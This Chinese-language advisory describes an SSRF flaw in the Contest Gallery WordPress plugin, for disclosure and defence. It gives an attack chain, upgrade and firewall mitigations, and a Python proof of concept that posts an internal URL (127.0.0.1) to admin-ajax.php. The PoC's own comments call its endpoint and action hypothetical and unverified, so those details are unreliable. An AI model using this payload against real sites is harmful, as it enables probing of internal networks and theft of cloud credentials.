CVE-2026-24964 CVSS 6.4 中危

CVE-2026-24964 Contest Gallery SSRF漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24964

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Contest Gallery

漏洞概述

Contest Gallery插件存在服务端请求伪造（SSRF）漏洞。由于未对用户输入的URL地址进行严格过滤，攻击者可利用该漏洞诱导服务器向内网或外部发起恶意请求，从而可能导致敏感信息泄露或进一步的内网渗透。

技术细节

该漏洞发生于Contest Gallery插件处理URL请求的逻辑中，CVSS v3.1评分为6.4（中危）。核心原因是后端未对用户输入的URL参数实施有效的校验与过滤机制。攻击者无需用户交互，仅需低权限账户即可发起攻击。利用过程中，攻击者构造包含内网地址（如http://127.0.0.1或AWS元数据服务地址）的恶意请求发送至服务器。服务器解析后，会代为向该内网地址发起请求。由于作用域为Changed（S:C），攻击者可借此绕过网络边界防御，探测内网端口、窃取敏感文件或云服务凭证，对系统的机密性和完整性构成威胁。

攻击链分析

STEP 1

侦察

攻击者识别目标WordPress站点是否安装了Contest Gallery插件及其版本。

STEP 2

利用

攻击者获取低权限账户，向插件接口发送包含恶意内网URL（如127.0.0.1）的请求。

STEP 3

请求伪造

服务器端接收并解析请求，向攻击者指定的内网地址发起HTTP连接。

STEP 4

影响

攻击者根据回显或时间延迟判断内网服务状态，获取敏感信息或进行下一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_ssrf(target_url):
    """
    Proof of Concept for CVE-2026-24964
    Attempts to trigger SSRF by targeting an internal address.
    """
    # Vulnerable endpoint (hypothetical based on plugin structure)
    endpoint = "/wp-admin/admin-ajax.php"
    full_url = f"{target_url}{endpoint}"
    
    # Malicious payload targeting localhost
    payload = {
        "action": "cg_gallery_upload", # Example action, needs verification
        "image_url": "http://127.0.0.1:80"
    }
    
    try:
        response = requests.post(full_url, data=payload, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check server logs or response for SSRF indicators.")
            print(f"Response length: {len(response.text)}")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://example-wordpress-site.com"
    check_ssrf(target)

影响范围

Contest Gallery <= 28.1.2.1

防御指南

临时缓解措施

建议立即升级Contest Gallery插件到修复了该漏洞的版本。如果暂时无法升级，应配置Web应用防火墙（WAF）拦截包含内网IP段的请求，并在网络层面严格限制服务器的出站连接，禁止访问非必要的内部网络资源。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表